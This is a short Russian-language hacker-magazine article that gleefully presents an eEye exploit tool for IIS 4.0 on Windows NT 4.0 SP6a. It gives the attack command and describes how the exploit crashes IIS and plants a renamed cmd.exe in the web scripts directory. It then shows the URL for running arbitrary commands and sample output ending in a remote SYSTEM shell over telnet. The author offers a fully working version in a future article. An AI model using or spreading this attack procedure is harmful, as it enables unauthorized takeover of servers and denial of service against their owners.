Привет перцы!

Парни из команды Eeye снова подарили нам
чумовой експлойт на IIS4.0. Если target сервак
работает под NT4.0+IIS4.0+SP6a, то его можно поиметь
и, соответственно, порулить им. Сей exploit
довольно свеж, но это demo версия.
Атакуем :
iishack1.5.exe www.deadserver.com 80 2323

1. При атаке IIS умирает до перезапуска
сервака.
2. После атаки в каталоге scripts удаленного
сервера появляется два файла eeyehack.exe &
eeyerulez.asp, поясняю eeyehack.exe — это ничто иное как
переименованный cmd. Что это значит? Это
значит вперед и с песней…

www.deadserver.com/scripts/eeyehack.exe /c any_command_here

В реале это работает так…(не демо):

C:\>iishack1.5.exe www.i_love_this_game.com 80 6969
Attempting to find an executable directory…
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit…
Exploit sent! Now telnet to www.i_love_this_game.com on port 6969 and you should
get a cmd prompt.
C:\>telnet  www.i_love_this_game.com 6969
Trying  www.i_love_this_game.com…
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

Если тебе понравилось сие представление,
напиши мне, и в следующей статье я выложу
рабочую версию, которая дает долгожданный
шелл на любой порт ака ncx…

Оставить мнение

Check Also

Windows 10 против шифровальщиков. Как устроена защита в обновленной Windows 10

Этой осенью Windows 10 обновилась до версии 1709 с кодовым названием Fall Creators Update …